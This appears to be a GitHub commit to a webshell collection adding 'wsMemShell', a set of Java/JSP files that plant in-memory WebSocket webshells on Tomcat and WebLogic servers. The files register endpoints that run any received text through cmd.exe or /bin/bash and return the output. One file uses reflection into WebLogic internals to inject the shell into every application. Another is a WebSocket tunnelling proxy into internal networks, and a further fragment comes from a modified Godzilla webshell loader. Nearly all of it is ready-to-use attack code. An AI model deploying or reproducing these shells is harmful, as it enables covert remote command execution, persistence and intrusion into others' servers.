add wsmemshell

thanks @veo
This commit is contained in:
tennc 2022-07-26 13:09:53 +08:00 committed by GitHub
parent 1643b37786
commit 996152da78
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
11 changed files with 383 additions and 0 deletions

24
wsMemShell/Godzilla.java Normal file
View file

@ -0,0 +1,24 @@
// 哥斯拉实现websocket马核心代码片段
//由于是反编译修改了原作者的软件所以并不会公布工具但会陆续公开实现代码和实现过程原理
public void onMessage(ByteBuffer databf) {
try {
data=x(databf.array(), false);
if (session.getUserProperties().get("payload")==null){
session.getUserProperties().put("payload",new X(this.getClass().getClassLoader()).Q(data));
session.getBasicRemote().sendObject(x("ok".getBytes(), true));
}else{
session.getUserProperties().put("parameters", data);
Object f=((Class)session.getUserProperties().get("payload")).newInstance();
java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();
f.equals(arrOut);
f.equals(session);
f.equals(data);
f.toString();
session.getBasicRemote().sendObject(x(arrOut.toByteArray(), true));
}
} catch (Exception ignored) {
}
}

48
wsMemShell/WsCmd.java Normal file

File diff suppressed because one or more lines are too long

BIN
wsMemShell/image/1.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 113 KiB

BIN
wsMemShell/image/2.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 195 KiB

BIN
wsMemShell/image/3.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 332 KiB

BIN
wsMemShell/image/ws.jpg Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 113 KiB

BIN
wsMemShell/image/ws2.jpg Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 114 KiB

View file

@ -0,0 +1,85 @@
<%@ page import="javax.websocket.server.ServerEndpointConfig" %>
<%@ page import="javax.websocket.server.ServerContainer" %>
<%@ page import="javax.websocket.*" %>
<%@ page import="java.io.*" %>
<%@ page import="org.glassfish.tyrus.server.TyrusServerContainer" %>
<%@ page import="javax.management.MBeanServer" %>
<%@ page import="java.lang.management.ManagementFactory" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="com.sun.jmx.mbeanserver.Repository" %>
<%@ page import="com.sun.jmx.mbeanserver.NamedObject" %>
<%@ page import="java.util.Set" %>
<%@ page import="javax.management.ObjectName" %>
<%@ page import="java.util.HashSet" %>
<%@ page import="weblogic.servlet.internal.WebAppServletContext" %>
<%!
public static class CmdEndpoint extends Endpoint implements MessageHandler.Whole<String> {
private Session session;
@Override
public void onMessage(String s) {
try {
Process process;
boolean bool = System.getProperty("os.name").toLowerCase().startsWith("windows");
if (bool) {
process = Runtime.getRuntime().exec(new String[] { "cmd.exe", "/c", s });
} else {
process = Runtime.getRuntime().exec(new String[] { "/bin/bash", "-c", s });
}
InputStream inputStream = process.getInputStream();
StringBuilder stringBuilder = new StringBuilder();
int i;
while ((i = inputStream.read()) != -1)
stringBuilder.append((char)i);
inputStream.close();
process.waitFor();
session.getBasicRemote().sendText(stringBuilder.toString());
} catch (Exception exception) {
exception.printStackTrace();
}
}
@Override
public void onOpen(final Session session, EndpointConfig config) {
this.session = session;
session.addMessageHandler(this);
}
}
%>
<%
// 遍历所有 container 进行添加
String path = request.getParameter("path");
ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(CmdEndpoint.class, path).build();
MBeanServer server = ManagementFactory.getPlatformMBeanServer();
Field field = server.getClass().getDeclaredField("wrappedMBeanServer");
field.setAccessible(true);
Object obj = field.get(server);
field = obj.getClass().getDeclaredField("mbsInterceptor");
field.setAccessible(true);
obj = field.get(obj);
field = obj.getClass().getDeclaredField("repository");
field.setAccessible(true);
Repository repository = (Repository)field.get(obj);
Set<NamedObject> namedObjects = repository.query(new ObjectName("com.bea:Type=ApplicationRuntime,*"),null);
for(NamedObject namedObject : namedObjects){
field = namedObject.getObject().getClass().getDeclaredField("managedResource");
field.setAccessible(true);
obj = field.get(namedObject.getObject());
field = obj.getClass().getSuperclass().getDeclaredField("children");
field.setAccessible(true);
HashSet set = (HashSet)field.get(obj);
for(Object o : set){
if(o.getClass().getName().endsWith("WebAppRuntimeMBeanImpl")){
field = o.getClass().getDeclaredField("context");
field.setAccessible(true);
WebAppServletContext servletContext = (WebAppServletContext) field.get(o);
TyrusServerContainer container = (TyrusServerContainer) servletContext.getAttribute(ServerContainer.class.getName());
try {
container.register(configEndpoint);
out.println("add success,path: " + servletContext.getContextPath()+path);
} catch (Exception e) {
}
}
}
}
%>

View file

@ -0,0 +1,54 @@
<%@ page import="javax.websocket.server.ServerEndpointConfig" %>
<%@ page import="javax.websocket.server.ServerContainer" %>
<%@ page import="javax.websocket.*" %>
<%@ page import="java.io.*" %>
<%@ page import="org.glassfish.tyrus.server.TyrusServerContainer" %>
<%!
public static class CmdEndpoint extends Endpoint implements MessageHandler.Whole<String> {
private Session session;
@Override
public void onMessage(String s) {
try {
Process process;
boolean bool = System.getProperty("os.name").toLowerCase().startsWith("windows");
if (bool) {
process = Runtime.getRuntime().exec(new String[] { "cmd.exe", "/c", s });
} else {
process = Runtime.getRuntime().exec(new String[] { "/bin/bash", "-c", s });
}
InputStream inputStream = process.getInputStream();
StringBuilder stringBuilder = new StringBuilder();
int i;
while ((i = inputStream.read()) != -1)
stringBuilder.append((char)i);
inputStream.close();
process.waitFor();
session.getBasicRemote().sendText(stringBuilder.toString());
} catch (Exception exception) {
exception.printStackTrace();
}
}
@Override
public void onOpen(final Session session, EndpointConfig config) {
this.session = session;
session.addMessageHandler(this);
}
}
%>
<%
// Weblogic 在获取 ServerContainer 时有些问题,例如在 bea_wls_internal 目录下 servletContext 获取不到 ServerContainer也就是此jsp传到 bea_wls_internal目录是无效的但自己部署的war包路径有效目前还不知道为什么
// 可以使用 wsAddAllContainer.jsp 遍历所有的 Container 进行添加,这样 wsAddAllContainer.jsp 上传到bea_wls_internal目录也是可以的
String path = request.getParameter("path");
ServletContext servletContext = request.getSession().getServletContext();
ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(CmdEndpoint.class, path).build();
TyrusServerContainer container = (TyrusServerContainer) servletContext.getAttribute(ServerContainer.class.getName());
try {
container.register(configEndpoint);
} catch (Exception e) {
e.printStackTrace();
}
%>

52
wsMemShell/wscmd.jsp Normal file
View file

@ -0,0 +1,52 @@
<%@ page import="javax.websocket.server.ServerEndpointConfig" %>
<%@ page import="javax.websocket.server.ServerContainer" %>
<%@ page import="javax.websocket.*" %>
<%@ page import="java.io.*" %>
<%!
public static class C extends Endpoint implements MessageHandler.Whole<String> {
private Session session;
@Override
public void onMessage(String s) {
try {
Process process;
boolean bool = System.getProperty("os.name").toLowerCase().startsWith("windows");
if (bool) {
process = Runtime.getRuntime().exec(new String[] { "cmd.exe", "/c", s });
} else {
process = Runtime.getRuntime().exec(new String[] { "/bin/bash", "-c", s });
}
InputStream inputStream = process.getInputStream();
StringBuilder stringBuilder = new StringBuilder();
int i;
while ((i = inputStream.read()) != -1)
stringBuilder.append((char)i);
inputStream.close();
process.waitFor();
session.getBasicRemote().sendText(stringBuilder.toString());
} catch (Exception exception) {
exception.printStackTrace();
}
}
@Override
public void onOpen(final Session session, EndpointConfig config) {
this.session = session;
session.addMessageHandler(this);
}
}
%>
<%
String path = request.getParameter("path");
ServletContext servletContext = request.getSession().getServletContext();
ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(C.class, path).build();
ServerContainer container = (ServerContainer) servletContext.getAttribute(ServerContainer.class.getName());
try {
if (servletContext.getAttribute(path) == null){
container.addEndpoint(configEndpoint);
servletContext.setAttribute(path,path);
}
out.println("success, connect url path: " + servletContext.getContextPath() + path);
} catch (Exception e) {
out.println(e.toString());
}
%>

120
wsMemShell/wsproxy.jsp Normal file
View file

@ -0,0 +1,120 @@
<%@ page import="javax.websocket.server.ServerEndpointConfig" %>
<%@ page import="javax.websocket.server.ServerContainer" %>
<%@ page import="javax.websocket.*" %>
<%@ page import="java.io.*" %>
<%@ page import="java.nio.channels.AsynchronousSocketChannel" %>
<%@ page import="java.util.HashMap" %>
<%@ page import="java.nio.ByteBuffer" %>
<%@ page import="java.nio.channels.CompletionHandler" %>
<%@ page import="java.net.InetSocketAddress" %>
<%@ page import="java.util.concurrent.TimeUnit" %>
<%@ page import="java.util.concurrent.Future" %>
<%!
public static class ProxyEndpoint extends Endpoint {
long i =0;
ByteArrayOutputStream baos = new ByteArrayOutputStream();
HashMap<String,AsynchronousSocketChannel> map = new HashMap<String,AsynchronousSocketChannel>();
static class Attach {
public AsynchronousSocketChannel client;
public Session channel;
}
void readFromServer(Session channel,AsynchronousSocketChannel client){
final ByteBuffer buffer = ByteBuffer.allocate(50000);
Attach attach = new Attach();
attach.client = client;
attach.channel = channel;
client.read(buffer, attach, new CompletionHandler<Integer, Attach>() {
@Override
public void completed(Integer result, final Attach scAttachment) {
buffer.clear();
try {
if(buffer.hasRemaining() && result>=0)
{
byte[] arr = new byte[result];
ByteBuffer b = buffer.get(arr,0,result);
baos.write(arr,0,result);
ByteBuffer q = ByteBuffer.wrap(baos.toByteArray());
if (scAttachment.channel.isOpen()) {
scAttachment.channel.getBasicRemote().sendBinary(q);
}
baos = new ByteArrayOutputStream();
readFromServer(scAttachment.channel,scAttachment.client);
}else{
if(result > 0)
{
byte[] arr = new byte[result];
ByteBuffer b = buffer.get(arr,0,result);
baos.write(arr,0,result);
readFromServer(scAttachment.channel,scAttachment.client);
}
}
} catch (Exception ignored) {}
}
@Override
public void failed(Throwable t, Attach scAttachment) {t.printStackTrace();}
});
}
void process(ByteBuffer z,Session channel)
{
try{
if(i>1)
{
AsynchronousSocketChannel client = map.get(channel.getId());
client.write(z).get();
z.flip();
z.clear();
}
else if(i==1)
{
String values = new String(z.array());
String[] array = values.split(" ");
String[] addrarray = array[1].split(":");
AsynchronousSocketChannel client = AsynchronousSocketChannel.open();
int po = Integer.parseInt(addrarray[1]);
InetSocketAddress hostAddress = new InetSocketAddress(addrarray[0], po);
Future<Void> future = client.connect(hostAddress);
try {
future.get(10, TimeUnit.SECONDS);
} catch(Exception ignored){
channel.getBasicRemote().sendText("HTTP/1.1 503 Service Unavailable\r\n\r\n");
return;
}
map.put(channel.getId(), client);
readFromServer(channel,client);
channel.getBasicRemote().sendText("HTTP/1.1 200 Connection Established\r\n\r\n");
}
}catch(Exception ignored){
}
}
@Override
public void onOpen(final Session session, EndpointConfig config) {
i=0;
session.addMessageHandler(new MessageHandler.Whole<ByteBuffer>() {
@Override
public void onMessage(ByteBuffer message) {
try {
message.clear();
i++;
process(message,session);
} catch (Exception ignored) {
}
}
});
}
}
%>
<%
String path = request.getParameter("path");
ServletContext servletContext = request.getSession().getServletContext();
ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(ProxyEndpoint.class, path).build();
ServerContainer container = (ServerContainer) servletContext.getAttribute(ServerContainer.class.getName());
try {
if (servletContext.getAttribute(path) == null){
container.addEndpoint(configEndpoint);
servletContext.setAttribute(path,path);
}
out.println("success, connect url path: " + servletContext.getContextPath() + path);
} catch (Exception e) {
out.println(e.toString());
}
%>